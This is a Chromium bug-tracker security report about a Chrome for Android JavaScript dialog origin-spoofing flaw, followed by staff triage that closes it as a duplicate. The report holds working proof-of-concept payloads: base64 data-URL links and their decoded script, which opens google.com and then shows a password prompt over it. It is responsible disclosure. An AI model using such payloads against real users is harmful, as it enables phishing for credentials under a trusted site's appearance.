New issue
Advanced search Search tips

Issue 677728 link

Starred by 2 users
Status: Duplicate
Merged: issue 606104
Owner:
a...@chromium.org
Closed: Jan 2017
Cc:
nparker@chromium.org
Components:
EstimatedDays: ----
NextAction: ----
OS: Android
Pri: 1
Type: Bug-Security



Sign in to add a comment

Security: Chrome JavaScript dialogs(alert/prompt/confirm) Spoof

Reported by xis...@gmail.com, Jan 1 2017 
VULNERABILITY DETAILS
Chrome is prone to a dialog box origin spoofing vulnerability. The vulnerability presents itself as dialog boxes from inactive windows may appear in other active windows. This issue may allow a remote attacker to carry out phishing style attacks.

VERSION
Chrome Version: 55.0.2883.91 [Stable]
Operating System: [Android]
Phone: Nexus Phone

REPRODUCTION CASE
POC(1)
<a href="data:text/html;base64,PHNjcmlwdD4NCmZ1bmN0aW9uIGNjKCl7DQoJIHByb21wdCgicGFzc3dvcmQiKTsNCn0NCg0KZnVuY3Rpb24gYmIoKXsgDQoJbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCglsaW5rLmhyZWYgPSAnaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbSc7DQoJbGluay50YXJnZXQ9Im5ldyI7DQoJbGluay5jbGljaygpOw0KCWRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQobGluayk7DQp9DQoNCmZ1bmN0aW9uIGFhKCl7DQoJYmIoKTsNCgljYygpOw0KfQ0KPC9zY3JpcHQ+DQo8YnV0dG9uIG9uY2xpY2s9ImFhKCkiPkNsaWNrIG1lPC9idXR0b24+">Click me</a>

POC(2)
<object data="data:text/html;base64,PHNjcmlwdD4NCmZ1bmN0aW9uIGNjKCl7DQoJIHByb21wdCgicGFzc3dvcmQiKTsNCn0NCg0KZnVuY3Rpb24gYmIoKXsgDQoJbGluayA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ2EnKTsNCglsaW5rLmhyZWYgPSAnaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbSc7DQoJbGluay50YXJnZXQ9Im5ldyI7DQoJbGluay5jbGljaygpOw0KCWRvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQobGluayk7DQp9DQoNCmZ1bmN0aW9uIGFhKCl7DQoJYmIoKTsNCgljYygpOw0KfQ0KPC9zY3JpcHQ+DQo8YnV0dG9uIG9uY2xpY2s9ImFhKCkiPkNsaWNrIG1lPC9idXR0b24+"></object>

base64 payload code:

<script>
function cc(){
 prompt("password");
}

function bb(){ 
 link = document.createElement('a');
 link.href = 'https://www.google.com';
 link.target="new";
 link.click();
 document.body.appendChild(link);
}

function aa(){
 bb();
 cc();
}
</script>
<button onclick="aa()">Click me</button>
spoof-1.png
70.7 KB View Download
spoof-2.png
94.2 KB View Download

Comment 1 by mmoroz@chromium.org, Jan 2 2017

Components: UI>Browser>Navigation

Comment 2 by kenrb@chromium.org, Jan 2 2017

Owner: nparker@chromium.org
Status: Assigned (was: Unconfirmed)
Assigning to nparker@ for triage.

Comment 3 by mmoroz@chromium.org, Jan 4 2017

Labels: Security_Impact-Stable OS-Android

Comment 4 by mmoroz@chromium.org, Jan 4 2017 

I'm setting Medium severity for now. Please feel free to adjust as needed.

Comment 5 by mmoroz@chromium.org, Jan 4 2017

Labels: Pri-1

Comment 6 by mmoroz@chromium.org, Jan 4 2017

Labels: Security_Severity-Medium
Project Member

Comment 7 by sheriffbot@chromium.org, Jan 4 2017

Labels: M-56

Comment 8 by nparker@chromium.org, Jan 4 2017

Cc: nparker@chromium.org
Owner: a...@chromium.org
I'd agree w/ medium, since it's showing attacker-controlled content over another origin.

avi -- Is this a race? Seems like if the click comes before the prompt(), the latter shouldn't run on the new page.

Comment 9 by mea...@chromium.org, Jan 4 2017 

I believe this is a dupe of  bug 606104 .

Comment 10 by a...@chromium.org, Jan 4 2017

Mergedinto: 606104
Status: Duplicate (was: Assigned)
meacer, looks like it to me, too.

Comment 11 by xis...@gmail.com, Jan 5 2017 

HI,My POCs work well in latest version of android chrome/canary.
But i don't reproduce the poc of  bug 606104 .
Online demo:http://xisigr.com/test/spoof/chrome/dialog.html
Project Member

Comment 12 by sheriffbot@chromium.org, Jan 4

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot

Sign in to add a comment